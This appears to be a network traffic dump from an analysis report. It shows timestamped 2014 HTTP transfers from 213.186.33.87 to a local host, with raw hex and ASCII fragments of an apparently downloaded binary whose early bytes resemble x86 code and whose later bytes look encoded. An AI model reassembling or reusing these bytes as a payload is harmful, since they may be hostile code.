Aug 8, 2014 11:26:05.402508020 MESZ801032213.186.33.87192.168.1.13Data Raw: d2 83 c2 01 66 89 15 84 53 45 00 eb 12 ff 15 08 61 42 00 ff 15 9c 61 42 00 ff 15 dc 62 42 00 c7 85 80 fd ff ff 01 00 00 00 c7 85 cc fb ff ff 00 00 00 00 eb 0f 8b 85 cc fb ff ff 83 c0 01 89 85 cc fb ff ff 81 bd cc fb ff ff 00 02 00 00 7d 14 68 00
Data Ascii: fSEaBaBbB}hQaBD3SESEbBSECVSEp%E%yH@<<t,SE
90
Aug 8, 2014 11:26:05.402625084 MESZ801032213.186.33.87192.168.1.13Data Raw: 8b 8d 18 fd ff ff 33 d2 3b 0d 38 4f 44 00 0f 94 c2 83 e2 1f 89 95 18 fd ff ff eb 0c ff 15 a8 62 42 00 ff 15 90 60 42 00 0f b6 05 e1 ef 42 00 89 85 94 fe ff ff 8b 8d 94 fe ff ff 83 e1 5a 89 0d e8 52 45 00 33 d2 74 13 83 bd 94 fd ff ff 51 1b c0 f7
Data Ascii: 3;8ODbB`BBZRE3tQfND3X!@bB`BCND/"E#ND8OD`Pj`BC3fUifMDkn3tESE
92
Aug 8, 2014 11:26:05.402632952 MESZ801032213.186.33.87192.168.1.13Data Raw: 0c 62 42 00 ff 15 00 62 42 00 0f b6 0d 9b 73 44 00 89 8d d0 fe ff ff 8b 15 38 4f 44 00 39 15 d0 53 45 00 1b c0 f7 d8 a3 38 4f 44 00 0f b6 0d f8 23 42 00 39 0d e8 52 45 00 74 16 0f b6 15 3c 02 45 00 2b 95 d0 fe ff ff 66 89 15 34 4f 44 00 eb 32 a1
Data Ascii: bBbBsD8OD9SE8OD#B9REt<E+f4OD28OD3tt.D
92
Aug 8, 2014 11:26:05.404427052 MESZ801032213.186.33.87192.168.1.13Data Raw: c1 79 89 8d 5c fe ff ff eb 13 0f be 15 d4 53 45 00 0b 95 a0 fd ff ff 89 95 a0 fd ff ff c7 85 b8 fb ff ff 00 00 00 00 eb 0f 8b 85 b8 fb ff ff 83 c0 01 89 85 b8 fb ff ff 81 bd b8 fb ff ff 01 02 00 00 7d 02 eb e3 c6 05 56 53 45 00 9f 0f b6 0d 0c 39
Data Ascii: y\SE}VSE9EE]CVSE+#Dt2}tSETU0BTaBUEMp
93
Aug 8, 2014 11:26:05.404443026 MESZ801032213.186.33.87192.168.1.13Data Raw: 0f be 0d 50 4d 44 00 83 e1 1f b8 d1 00 00 00 d3 f8 89 45 a0 0f b6 15 88 17 43 00 0f be 0d ba 53 45 00 d3 fa 89 95 f0 fc ff ff eb 06 ff 15 98 62 42 00 0f b6 05 72 99 42 00 0f b6 0d f0 b5 44 00 83 e1 1f d3 e0 66 a3 a2 4d 44 00 8d 8d 60 ff ff ff 51
Data Ascii: PMDECSEbBrBDfMD`Qj`B0&REqC3;;MQMDEzC:fE&;0yJB$$
95
Aug 8, 2014 11:26:05.404565096 MESZ801032213.186.33.87192.168.1.13Data Raw: 66 89 15 ec 4e 44 00 b8 39 00 00 00 85 c0 74 5f 8b 8d 94 fe ff ff 0b 4d d8 83 e1 1f 66 89 8d f4 fc ff ff ba 15 00 00 00 85 d2 74 0c c7 85 b8 fe ff ff 01 00 00 00 eb 2a 0f bf 05 a4 4e 44 00 85 c0 74 09 c6 05 57 53 45 00 00 eb 16 8b 8d 48 ff ff ff
Data Ascii: fND9t_Mft*NDtWSEHh8ODfMD|tjjdQhPDhPDbBfNDfTNDfODHfMfLSEEtq4
95
Aug 8, 2014 11:26:05.410764933 MESZ801032213.186.33.87192.168.1.13Data Raw: 95 84 fd ff ff 8b 85 08 fd ff ff 6b c0 3b 85 c0 74 1c 8b 8d 74 fd ff ff 83 e1 1f 8b 95 a0 fd ff ff d3 fa 83 e2 1f 89 95 f0 fc ff ff eb 18 b8 45 00 00 00 85 c0 74 0f 8b 4d e0 83 c1 51 83 e1 1f 88 0d 98 53 45 00 0f b6 15 dd 9f 43 00 33 c0 3b 15 38
Data Ascii: k;ttEtMQSEC3;8OD\,t#5&D*QMD}hRaBB8ODSEE\@U
97
Aug 8, 2014 11:26:05.410770893 MESZ801032213.186.33.87192.168.1.13Data Raw: 4d 44 00 66 a3 b0 4d 44 00 0f b7 0d b0 4d 44 00 6b c9 6d 89 8d 60 fe ff ff 8d 95 60 ff ff ff 52 6a 00 ff 15 10 60 42 00 0f b6 05 75 2c 42 00 89 85 2c fe ff ff c7 85 d4 fe ff ff d2 00 00 00 0f b6 0d c0 33 45 00 83 e1 1f ba 2a 00 00 00 d3 fa 89 95
Data Ascii: MDfMDMDkm``Rj`Bu,B,3E*ftfMD`!l,3%yH@SSt(3( MD3SE`#
98
Aug 8, 2014 11:26:05.410773993 MESZ801032213.186.33.87192.168.1.13Data Raw: 44 00 33 8d dc fc ff ff 89 8d 44 ff ff ff eb 0c ff 15 5c 60 42 00 ff 15 7c 62 42 00 c7 45 b4 63 00 00 00 eb 09 8b 55 b4 83 c2 01 89 55 b4 81 7d b4 cd 00 00 00 73 14 0f b7 05 7a 4d 44 00 03 85 e4 fc ff ff a3 8c 53 45 00 eb da c7 85 18 fd ff ff 65
Data Ascii: D3D\`B|bBEcUU}szMDSEeffNDNDfOD`BUE`SEE$WSESEMtCfNDtWSEq
99
Aug 8, 2014 11:26:05.476505995 MESZ801032213.186.33.87192.168.1.13Data Raw: 44 00 89 45 88 c7 45 98 52 00 00 00 8b 4d 98 89 8d 44 fe ff ff ba 84 00 00 00 2b 95 44 fe ff ff 89 95 5c fe ff ff 8a 85 f0 fc ff ff a2 51 4d 44 00 0f b6 0d a8 26 42 00 89 4d a0 c7 45 a4 76 00 00 00 33 d2 83 7d a4 47 0f 94 c2 89 15 d4 4e 44 00 8b
Data Ascii: DEERMD+D\QMD&BMEv3}GNDDSEXPMD\E(}th=|NDt+USE<Dtf@ND+UB
101
Aug 8, 2014 11:26:05.477065086 MESZ801032213.186.33.87192.168.1.13Data Raw: 00 fd ff ff 33 d2 b9 ba 00 00 00 f7 f1 2d c7 00 00 00 66 a3 bc 4d 44 00 0f b7 15 bc 4d 44 00 33 c9 83 fa 11 0f 94 c1 8b 85 60 fe ff ff 99 be 8c 00 00 00 f7 fe 33 c8 51 0f b6 15 fa f3 41 00 33 c0 3b 95 c4 fc ff ff 0f 9c c0 0f b6 0d 01 a3 43 00 33
Data Ascii: 3-fMDMD3`3QA3;C3P0OD0QCEf&SE&SEffND\HWSEwWSE0ZxND3x
101
Aug 8, 2014 11:26:05.477092028 MESZ801032213.186.33.87192.168.1.13Data Raw: ff 8b 85 44 fe ff ff 33 d2 b9 bc 00 00 00 f7 f1 8b c2 33 d2 b9 01 00 00 00 f7 f1 83 c2 0b 89 95 e8 f9 ff ff 83 bd e8 f9 ff ff 0b 74 02 eb 2b 8b 85 3c ff ff ff 99 b9 d3 00 00 00 f7 f9 89 85 40 fe ff ff 0f bf 15 a4 4e 44 00 33 c0 3b 55 dc 0f 9f c0
Data Ascii: D33t+<@ND3;UQMDUjjLQjj4RE%EE5MM}'sPMDUNDaBfMDfNDND#UfE
103
Aug 8, 2014 11:26:05.477109909 MESZ801032213.186.33.87192.168.1.13Data Raw: af 4d b4 89 4d 9c 0f b6 15 2b a9 44 00 0f af 15 8c 53 45 00 8b 8d c0 fe ff ff 83 e1 1f d3 e2 85 d2 74 09 c7 45 e4 01 00 00 00 eb 15 8b 45 9c 33 c9 3b 85 cc fe ff ff 0f 94 c1 66 89 0d ec 4e 44 00 c7 45 b4 2a 00 00 00 8b 55 b4 69 d2 8d 00 00 00 89
Data Ascii: MM+DSEtEE3;fNDE*Ui`h@`%yH@t+B3fND30ODHaB$bBaBEfUfNDhB390OD
104
Aug 8, 2014 11:26:05.477633953 MESZ801032213.186.33.87192.168.1.13Data Raw: 1f 89 95 88 fd ff ff 8b 45 98 33 c9 3b 85 68 ff ff ff 0f 95 c1 83 e1 1f 66 89 0d fc 4e 44 00 eb 0c ff 15 88 60 42 00 ff 15 dc 61 42 00 c6 05 c2 53 45 00 41 0f b6 15 10 03 42 00 83 c2 68 89 95 50 fe ff ff 0f be 05 d4 53 45 00 89 85 54 ff ff ff b9
Data Ascii: E3;hfND`BaBSEABhPSET;fNDfNDfNDND]ELNDLNDTPfSEM;rbBbBbB
105
Aug 8, 2014 11:26:05.477680922 MESZ801032213.186.33.87192.168.1.13Data Raw: 00 83 e2 1f 89 95 94 fe ff ff c7 85 60 fe ff ff c0 00 00 00 8b 85 60 fe ff ff a3 e8 52 45 00 8b 0d e8 52 45 00 81 f1 c1 00 00 00 83 e1 1f 89 0d 30 4f 44 00 eb 0c ff 15 54 60 42 00 ff 15 10 61 42 00 c7 85 18 fd ff ff 2e 00 00 00 66 8b 95 18 fd ff
Data Ascii: ``RERE0ODT`BaB.ffODSE$|44ODh%yH@t.ODRMDTODD#c3C3TfMD
106
Aug 8, 2014 11:26:05.477699995 MESZ801032213.186.33.87192.168.1.13Data Raw: 4d 44 00 0f b7 15 9a 4d 44 00 89 95 28 fe ff ff 0f b6 05 fd 1e 42 00 89 85 24 fe ff ff b9 e1 00 00 00 85 c9 74 09 c6 05 56 53 45 00 01 eb 15 83 bd 24 fe ff ff 09 1b d2 f7 da 83 e2 1f 66 89 15 b0 4d 44 00 b8 71 00 00 00 66 a3 f0 4e 44 00 c7 45 d8
Data Ascii: MDMD(B$tVSE$fMDqfNDEsMWSEtE)P7E9+#MtWSE d`BtaBk38fUEE$DM3$4aB@B
108
Aug 8, 2014 11:26:05.478204012 MESZ801032213.186.33.87192.168.1.13Data Raw: ec 4e 44 00 3b 8d 7c fd ff ff 1b d2 f7 da 89 95 d4 fe ff ff 8b 45 a4 23 45 ec 89 85 78 ff ff ff c7 45 84 01 00 00 00 c7 85 40 ff ff ff f4 00 00 00 c7 45 e0 01 00 00 00 eb 12 ff 15 2c 62 42 00 ff 15 44 61 42 00 ff 15 fc 61 42 00 8b 8d 6c ff ff ff
Data Ascii: ND;|E#ExE@E,bBDaBaBlptCU3RE9M\xxxx}E#\fMDbBM
109
Aug 8, 2014 11:26:05.478295088 MESZ801032213.186.33.87192.168.1.13Data Raw: 05 52 81 44 00 33 c9 39 05 e8 52 45 00 0f 9f c1 89 8d 54 fe ff ff ba 81 00 00 00 66 89 15 f0 4e 44 00 8b 85 60 fe ff ff 89 85 fc fc ff ff c7 85 70 ff ff ff 21 00 00 00 8a 8d 70 ff ff ff 88 0d ca 53 45 00 c7 85 94 fe ff ff 10 00 00 00 8b 95 94 fe
Data Ascii: RD39RETfND`p!pSEfNDD+tXESE+E;ttM+SEND+p`ETtiBTND
110
Aug 8, 2014 11:26:05.478312969 MESZ801032213.186.33.87192.168.1.13Data Raw: 45 d8 33 85 24 fd ff ff 33 d2 b9 01 00 00 00 f7 f1 83 c2 66 89 95 ac f9 ff ff 83 bd ac f9 ff ff 66 74 02 eb 27 0f b6 15 56 53 45 00 03 95 40 ff ff ff 83 e2 1f 89 95 54 ff ff ff 83 bd 38 fe ff ff 73 1b c0 f7 d8 83 e0 1f 89 45 a4 8b 85 44 ff ff ff
Data Ascii: E3$3fft'VSE@T8sEDfU(PMD;@SEEwSEMDEM0ODD@ B`;l9EtH
112
Aug 8, 2014 11:26:05.478825092 MESZ801032213.186.33.87192.168.1.13Data Raw: 30 ff ff ff c3 00 00 00 8b 8d 30 ff ff ff 89 4d e8 c7 85 d8 fe ff ff 8a 00 00 00 c7 45 84 36 00 00 00 0f b6 15 55 31 44 00 3b 55 e8 1b c0 83 c0 01 3b 85 d8 fe ff ff 1b c9 83 c1 01 81 e1 00 00 00 80 79 05 49 83 c9 ff 41 83 c1 19 89 8d 98 f9 ff ff
Data Ascii: 00ME6U1D;U;yIAt'SEPv@3;QMDfMD`Bd`BSED3=SEEP/fPfREREWSE?
113
Aug 8, 2014 11:26:05.478842974 MESZ801032213.186.33.87192.168.1.13Data Raw: ff ff 1b c9 f7 d9 66 89 0d 20 4f 44 00 eb 12 8b 15 e8 52 45 00 33 95 60 fe ff ff 83 e2 1f 89 55 8c 8b 85 c8 fe ff ff 8b 8d 34 fe ff ff d3 e0 83 e0 1f a2 51 4d 44 00 eb 0c ff 15 5c 61 42 00 ff 15 fc 61 42 00 0f b6 0d 52 45 44 00 33 d2 83 f9 46 0f
Data Ascii: f ODRE3`U4QMD\aBaBRED3FSEHHHHU}SESEU:@$m#BM\Ds=)D39@
115
Aug 8, 2014 11:26:05.478852987 MESZ801032213.186.33.87192.168.1.13Data Raw: 00 00 c7 85 20 fd ff ff 6a 01 00 00 eb 0f 8b 85 20 fd ff ff 83 e8 0d 89 85 20 fd ff ff 81 bd 20 fd ff ff ed 00 00 00 7e 0c c7 85 10 fd ff ff 01 00 00 00 eb d9 8b 85 8c fd ff ff 33 d2 b9 69 00 00 00 f7 f1 89 45 b0 c7 45 f8 2a 00 00 00 0f b6 15 12
Data Ascii: j ~3iEE*CUtMMx3}fMD`BaBaBnE3;SESESEGDaB4bBSES
116
Aug 8, 2014 11:26:05.478871107 MESZ801032213.186.33.87192.168.1.13Data Raw: 8d b8 fe ff ff 76 5b ba 92 00 00 00 3b 95 b8 fe ff ff 1b c0 f7 d8 89 85 84 fd ff ff b9 80 00 00 00 85 c9 74 09 c7 45 80 01 00 00 00 eb 28 0f b6 15 90 53 45 00 33 c0 39 95 cc fe ff ff 0f 9c c0 25 cf 00 00 00 74 0f 8b 4d b0 0b 8d dc fe ff ff 89 8d
Data Ascii: v[;tE(SE39%tM\REwSEteRMD8OD`&BtC39fE)+;u aBHbB
117
Aug 8, 2014 11:26:05.492717981 MESZ801032213.186.33.87192.168.1.13Data Raw: c1 88 0d ec 52 45 00 eb 12 ff 15 dc 61 42 00 ff 15 a8 60 42 00 ff 15 38 61 42 00 c7 05 38 4f 44 00 01 00 00 00 8b 15 38 4f 44 00 89 95 d0 fc ff ff 0f bf 05 28 4f 44 00 23 85 d0 fc ff ff 89 45 84 b9 70 00 00 00 3b 4d e0 1b d2 83 c2 01 89 95 24 fe
Data Ascii: REaB`B8aB8OD8OD(OD#Ep;M$aBbB|ESE3;MSESE3;@DUEffMD3p,8;,3;8
118
Aug 8, 2014 11:26:05.492913961 MESZ801032213.186.33.87192.168.1.13Data Raw: 45 e8 c7 00 00 00 83 bd d8 fe ff ff 00 74 57 8b 95 18 fd ff ff 0b 55 88 89 55 8c 0f bf 05 fa 4e 44 00 b9 b4 00 00 00 2b c8 23 0d d0 53 45 00 74 14 33 d2 81 7d dc f8 00 00 00 0f 9c c2 88 15 52 4d 44 00 eb 0e a1 94 53 45 00 83 e0 73 66 a3 e8 4e 44
Data Ascii: EtWUUND+#SEt3}RMDSEsfNDMUlaBDaBXaBE`3;EXSESE3@0`B
120
Aug 8, 2014 11:26:05.492918968 MESZ801032213.186.33.87192.168.1.13Data Raw: 00 33 c9 39 85 68 ff ff ff 0f 95 c1 23 8d c0 fe ff ff 74 11 8b 95 70 fd ff ff 83 ca 68 89 95 9c fd ff ff eb 13 8b 85 d4 fc ff ff 3b 45 b0 1b c9 f7 d9 89 8d 08 fd ff ff 8b 4d ec 83 e1 1f ba cb 00 00 00 d3 e2 83 e2 1f 88 15 50 4d 44 00 eb 0c ff 15
Data Ascii: 39h#tph;EMPMDXaBbBEMWSETTB$0WSE3f0~AT3;T00$c
121
Aug 8, 2014 11:26:05.493009090 MESZ801032213.186.33.87192.168.1.13Data Raw: c7 45 88 7f 00 00 00 8b 55 88 89 95 68 ff ff ff c7 85 e0 fe
Data Ascii: EUh
121
Aug 8, 2014 11:26:05.493033886 MESZ801032213.186.33.87192.168.1.13Data Raw: ff ff cc 00 00 00 c7 85 68 ff ff ff 6a 00 00 00 b8 80 00 00 00 66 a3 e8 4e 44 00 0f b7 0d e8 4e 44 00 83 e1 1f 8b 95 68 ff ff ff d3 fa 89 55 e8 c7 85 a0 fd ff ff 85 00 00 00 8b 85 a0 fd ff ff 89 85 44 fe ff ff 8b 8d 44 fe ff ff 89 8d 60 fe ff ff
Data Ascii: hjfNDNDhUDD`3`68!~C BP KSESE?TTRE CEi3
123
Aug 8, 2014 11:26:05.493037939 MESZ801032213.186.33.87192.168.1.13Data Raw: 60 42 00 ff 15 3c 62 42 00 ff 15 dc 60 42 00 ff 15 e0 62 42 00 ff 15 dc 62 42 00 ff 15 58 62 42 00 ff 15 20 62 42 00 ff 15 5c 61 42 00 ff 15 30 60 42 00 ff 15 50 61 42 00 ff 15 c8 60 42 00 ff 15 30 61 42 00 ff 15 c0 62 42 00 e8 a4 8f 00 00 ff 15
Data Ascii: `B<bB`BbBbBXbB bB\aB0`BPaB`B0aBbB`B<`BLbB`BaB`BH`BT`B`BaB|aB`BaB0`B4bB`aBbBlaBaB`B`BhbBHaBaBaB3
124
Aug 8, 2014 11:26:05.493114948 MESZ801032213.186.33.87192.168.1.13Data Raw: bf 45 d8 89 45 b8 66 8b 4d b8 66 89 4d c8 0f b7 55 fc 89 55 dc 8b 45 c4 89 45 cc 8b 4d cc 89 4d b8 0f bf 55 d8 8b 4d f0 d3 e2 89 55 c4 8b 45 c4 99 b9 a1 00 00 00 f7 f9 88 45 fb 66 8b 55 d8 66 89 55 d8 0f bf 45 d8 89 45 dc 8b 4d dc 89 4d d0 66 8b
Data Ascii: EEfMfMUUEEMMUMUEEfUfUEEMMfUfUEEfMfMUUfEM#MMECfUfUEfEfEE1MMUtE5fERMU;M|CEEMtE
125
Aug 8, 2014 11:26:05.493143082 MESZ801032213.186.33.87192.168.1.13Data Raw: c8 b9 01 00 00 00 85 c9 74 0a 8b 55 d0 83 c2 04 66 89 55 fc 0f be 45 fb 33 c9 83 f8 26 0f 95 c1 66 89 4d d8 eb 04 c6 45 fb 00 c7 45 ec 00 00 00 00 83 7d b8 00 74 09 c7 45 f0 01 00 00 00 eb 22 8b 55 dc 81 e2 0f 00 00 80 79 05 4a 83 ca f0 42 83 e2
Data Ascii: tUfUE3&fMEE}tE"UyJB_tMEMt`MUMMtM3UE+tEU3;UE.M+M;tEM3;U
126
Aug 8, 2014 11:26:05.493148088 MESZ801032213.186.33.87192.168.1.13Data Raw: b4 fa 00 00 00 8b 45 b4 89 45 bc 0f be 4d fa 0f af 4d bc 88 4d c7 c7 45 b4 ba 00 00 00 c7 45 c8 0c 00 00 00 c6 45 e3 1b 0f b6 55 e3 89 55 bc 8a 45 c7 88 45 fb c7 45 b4 c6 00 00 00 c6 45 e3 15 8a 4d e3 88 4d fa 8a 55 fa 88 55 e3 b8 b0 00 00 00 66
Data Ascii: EEMMMEEEUUEEEEMMUUfEfMfME2E%UMUEEfMfMfUfUE-EEMMUUfEfEMMfUEEMMMzU8fEMMUU
128
Aug 8, 2014 11:26:05.493248940 MESZ801032213.186.33.87192.168.1.13Data Raw: 00 80 79 05 4a 83 ca ff 42 83 c2 71 89 55 a0 83 7d a0 71 74 02 eb 1d 0f b7 45 c0 33 c9 3b 45 d0 0f 9d c1 89 4d c8 0f be 55 fb 0f b6 45 c7 2b d0 66 89 55 c0 0f b6 4d c7 33 d2 3b 4d c8 0f 94 c2 88 55 fb 8b 45 b4 83 c0 27 83 e0 1f 89 45 c8 8b 4d f4
Data Ascii: yJBqU}qtE3;EMUE+fUM3;MUE'EMUEEEMMUUtEEfEW>tNEtEEfE&MEMfUfEUMfUEMHMUtE
128
Aug 8, 2014 11:26:05.499633074 MESZ801032213.186.33.87192.168.1.13Data Raw: 00 d3 fa 89 55 bc e9 04 fc ff ff 0f b7 45 c0 69 c0 b0 00 00 00 85 c0 74 51 c6 45 c7 01 0f b7 4d fc 33 d2 39 4d d0 0f 9d c2 0f b7 45 c0 0b d0 74 12 0f be 45 fa 99 b9 1e 00 00 00 f7 f9 66 89 45 fc eb 1e 0f b7 55 d4 85 d2 74 09 c7 45 bc 01 00 00 00
Data Ascii: UEitQEM39MEtEfEUtEEMEEUiE+tEE3]X0ef=IHB?FqHj{7hL2Ah=(
130
Aug 8, 2014 11:26:05.499655962 MESZ801032213.186.33.87192.168.1.13Data Raw: 95 0a a6 0a 61 0a 03 72 0a 0a 0a 0c 0a 79 9f 09 0a 62 0a c6 0a cf 0a 0a 1f de 57 0a 26 0a 0a 0a c8 0a 0e 0a 58 26 0a 0a 0a 0a 56 0a c8 7c 0a 1a 0a 82 9e c6 0a 0a f2 a8 ca 34 0a 0a 0a 0a eb 0a 9d c0 63 e5 0a 0a 0a 0a 1f 0a 11 2b 0a 99 0a 50 0a ff
Data Ascii: arybW&X&V|4c+P#*90'`"+(jZK3'I BT+; i".THP8Laih
131
Aug 8, 2014 11:26:05.509332895 MESZ801032213.186.33.87192.168.1.13Data Raw: 0a 0a 0a 9a 0a 28 0a 10 8b 0a 0a 0a 2d 0a 16 54 97 0a 41 0a 80 0a 24 0a 0a 0a 41 84 0a 8a 0a 0a 0a 11 0a 03 0a 31 46 81 0a 0a 0a 0a 0a d2 0a 0a 97 0a f8 9a 85 fd eb d8 90 0a fc 0a 0a 0a 0a 0a 0a 5a be c6 0a 0a 76 0a 0a e6 0a a8 e7 0a 97 0a 27 0a
Data Ascii: (-TA$A1FZv'=7{L)qelyKn(yh6%|P Pt8!x 2|!JX#DfR3V>a
132
Aug 8, 2014 11:26:05.509814024 MESZ801032213.186.33.87192.168.1.13Data Raw: 0a a1 56 0a 0a 53 4c 43 0a 0a 27 0a 0a 0a 7a 52 05 c6 0a f6 a0 21 0a 0a 0a 8b 0a 0a 0a 6e 0a 03 0a 0a 0a b1 b7 93 0a 0a 36 0a 62 0a 22 fd a6 c8 0a 6a 34 d8 e6 0a 0a 49 0a 0a 0a 2a 40 94 0a 0a d3 3d 02 c6 0a 0a 38 0a 1a 0a f0 eb 0c 0a 0a 09 0a d9
Data Ascii: VSLC'zR!n6b"j4I*@=8bwR+h`5Hy@P2`g|/yNM*KdJ0p84
133
Aug 8, 2014 11:26:05.509862900 MESZ801032213.186.33.87192.168.1.13Data Raw: 58 75 a5 0a 11 0a 92 0a 88 0a 14 0a 0a 0a 78 0a 0a d6 c2 85 2a 0a 0a 07 08 3e 39 0a 1f 0a 0a 2d 0a 0a 0a e3 0c 0a 08 0a 8c cd 57 8c 18 0a e7 0a e7 0a 13 37 0a 31 ee 91 0a 0a fc 97 0a 0a 0a 68 44 95 e2 0a 84 69 0e b7 0a 0a 43 0a 0a 0a d1 0a 46 bb
Data Ascii: Xux*>9-W71hDiCF+(}l0H CuF,~Pna<X_S&La.E1I\
135
Aug 8, 2014 11:26:05.510293961 MESZ801032213.186.33.87192.168.1.13Data Raw: c1 32 0a 61 3d 22 15 46 0a 0a 0a 0a 60 0a d5 0a d9 0a 83 90 8b 0a 0a 0a 0a 3b 0a 12 0a b1 e6 41 0a 0a 41 0a 0a 0a 0a 0a fe 0a 0a 22 34 0a 0a 0a 0a 82 07 0a 65 d6 0a 0a 0a c8 2b 8e 12 0a 0a 0a 0a 0a 0a 7f 54 0a aa 0a 0a 0a 45 0a 0a 0a 0a 47 a4 35
Data Ascii: 2a="F`;AA"4e+TEG5zhzoaJu6T`V[[EC?r)$ w"I=fU
135
Aug 8, 2014 11:26:05.510354996 MESZ801032213.186.33.87192.168.1.13Data Raw: 9d 0a 0a 0a 0a 1b 7a 42 0a fe 98 0a f9 0a 0a 0a 01 0a 0e 0a 0a 50 78 4b 0a 69 0a b4 3a 0a 0a 0a 0a 28 0a 31 9f a4 fe 0a eb 45 4e 0a 75 eb c2 0a d9 0a 02 0a 59 73 0a 31 41 82 a3 1c 09 0a 0a 42 0a 5a 62 f7 84 0a 1c 08 fe 79 0a 10 26 0a 03 0a 2b 0a
Data Ascii: zBPxKi:(1ENuYs1ABZby&+8)1=$hyRV'{#Hhw00r-@P'XtC4~?hTsH
137
254
Aug 8, 2014 11:26:06.484900951 MESZ801032213.186.33.87192.168.1.13Data Raw: ea 0a 8c 78 08 0a 0a 0c 0a f0 35 8a b9 c3 0a 0a 0a 35 0a 18 0a 42 0a 33 20 0a 0a 0a 16 fe d4 0a 43 4a 48 0a 0a 0a 6a 21 3e 0b 09 ef 71 4c 6e 41 0c 85 0a 7a 0a 3a 0a 76 18 a9 0a 81 7d 5c dd 29 0a 0a 0a 0a
Data Ascii: x55B3 CJHj!>qLnAz:v}\)
254
Aug 8, 2014 11:26:06.485024929 MESZ801032213.186.33.87192.168.1.13Data Raw: 4f 0a c7 92 7e d0 0a 11 00 17 a1 0a bf 0a b5 11 0a f5 0a 01 0a 0a 0c 95 e9 b8 e4 75 1f 9f 0a 0a 39 50 47 0a 0a 5d 6d 11 e0 95 0a 20 0a 42 0a 22 0a a5 10 0a 96 96 64 0b 4a 0a 34 0a a9 0a ed 0f 04 0a 0a 3e 38 4d 0a 0a 25 02 7c 0a 0a 50 5c c4 0a 40
Data Ascii: O~u9PG]m B"dJ4>8M%|P\@hL`LOVZR7dh]hma.V`rDU{c||a>`QSE4E
255
Aug 8, 2014 11:26:06.485042095 MESZ801032213.186.33.87192.168.1.13Data Raw: 45 0a 16 0a 1a e0 ea 0a 15 af 0a b5 65 e6 0a 10 0a 0a 0a 5e 0a 7b d9 01 0a 0a 6d 10 6a 0a 48 0a 83 0a 1e 0a 2a fd 0a 0a 07 ab 46 c3 0a d5 0a 0a 0a 02 0a d2 14 82 98 58 30 0a 29 e8 0a 0a fa 0a 0a 0a 70 0a 7b f5 df bf 5e 48 0d 0a 0a 0a 0a 0a 0a 0a
Data Ascii: Ee^{mjH*FX0)p{^H>P'|tI)0QNqmV,Q6E$IJW#>>"rz1POmc<b""DZq}n@0ua!!
257
Aug 8, 2014 11:26:06.485347986 MESZ801032213.186.33.87192.168.1.13Data Raw: 0a 0a be 87 b4 bf 0a 61 b4 77 ee 00 ea c4 58 a3 f1 44 36 f5 0a c0 31 0a a9 dc 8a 07 bb 0a 20 8c 24 0a 96 34 02 4b 0a 85 0a 2e 0a 94 0a ae 0a 68 f9 0a 0a 0a 0a 9c 92 a0 0a 0a 9f e3 3c 0b dd 0a 0a 0a ba 0a 21 3e 2b 93 3a 0a 0a f0 42 00 0a 1f 0a 4a
Data Ascii: awXD61 $4K.h<!>+:BJAW)E+[#2qRR!#yNT%[G6<6zDfVJiA:)b6^T!|I{4V?,2kRA
258
Aug 8, 2014 11:26:06.485649109 MESZ801032213.186.33.87192.168.1.13Data Raw: 0a d9 b7 cd 0a 0a 1f 9d 4c b9 0a 0a 02 66 0a 0a f3 58 5f 0a 0a b0 16 b1 7f 0a 97 0a c9 22 88 d1 9b 57 67 0a 0a 0a 7c ca a7 7e 1a 43 0a e3 0f d9 b8 0a 0a 0a 15 01 70 0a 0a 86 0a 0a 0a 6c 7f 07 dc 08 0a b0 0a 4a 34 aa ec 0a 81 0a d3 0a 48 cf 16 0a
Data Ascii: LfX_"Wg|~CplJ4HOd#LMxm7?Hb<<zPFm9X-ySc{T-=wH2`9*`|M83
259
Aug 8, 2014 11:26:06.485667944 MESZ801032213.186.33.87192.168.1.13Data Raw: 5a 0a ef 0a 0a 88 81 09 0a 0a 2c 03 5c 0a 73 0a f4 0a 1f 0a 32 0a 44 15 0a 37 0a 35 0a 12 05 0a e3 3c 0a c5 0a fa 0a 0a 01 0a 90 0a 0a c7 3c 24 0a 0a 33 0a bd 0a 0a 2c a2 55 be 12 9d d4 5a 31 0a 2c 8b fb 80 ea 0a 0a 74 85 0a 39 0a 0a 7f 57 b7 0a
Data Ascii: Z,\s2D75<<$3,UZ1,t9WBA>)2zph,DPSJq1b<d$B&~fF5O5C Y>F>L
261
Aug 8, 2014 11:26:06.485929012 MESZ801032213.186.33.87192.168.1.13Data Raw: 68 2d 0a 53 0a 0a 0a 0a 0a 7d 0a 83 0a 0a 0a 0a ef 0a 0a 31 0a 0a 0e 0a 80 0a 1f 0a 57 8b e4 c4 65 0a 0a 0a 0a 0a 0a 57 8c 0e 0a 0a 0c 0a 0a 52 0a 0a 64 0a 9a 0a 0a 0a b6 89 0a 0a 0a 0a 3b 0a 0a 18 0a 8c 0a 0a bc 29 20 0a 0a 0a 0a 0a 0a fc 2c 0a
Data Ascii: h-S}1WeWRd;) ,&;$(U7iE',PJb8j~`K|kK{NSC<MB"&%
262
Aug 8, 2014 11:26:06.486038923 MESZ801032213.186.33.87192.168.1.13Data Raw: 51 69 0a 57 0a 66 46 28 b2 0a 0a f0 0a 0a f9 7f be aa 0a 0a 11 85 0a b8 0a 0a 60 0a 0a b3 04 0a 12 d5 0a 00 0a 0a 0a b6 0a f8 0a 5f 0a 3d 5f 0a 0a 0a c2 69 0a f3 0a 0a 60 0a 0a 0a 52 82 0a e5 00 e2 5c d8 0a eb 0a 9c 0a 95 0a ad f1 0a 0a 58 fc bd
Data Ascii: QiWfF(`_=_i`R\X+6BxjG1hRlUgfLQP:uG=a}!aIE;>~MwS
263
Aug 8, 2014 11:26:06.486396074 MESZ801032213.186.33.87192.168.1.13Data Raw: 6c 0a 5c 2f b3 ee c1 0a 58 0a b1 cf 0a b8 0a fa 46 7f 0a 0a 81 3e 0a 08 0a a5 64 0a 86 0a 9f 0a 16 0a 0a 0a cc 0a d0 0a 11 0a 86 13 0a 0a 95 56 d4 0a 0a 68 0a 63 0a 86 46 61 0a 0a 1d af b9 0a 0a 0a 45 0a 0a 0a 77 cb de 00 0a ac ac 8e 0a 0a 0a 0a
Data Ascii: l\/XF>dVhcFaEwL"urRcg Y9+5'?l&ZfMy< bFN=ed
265
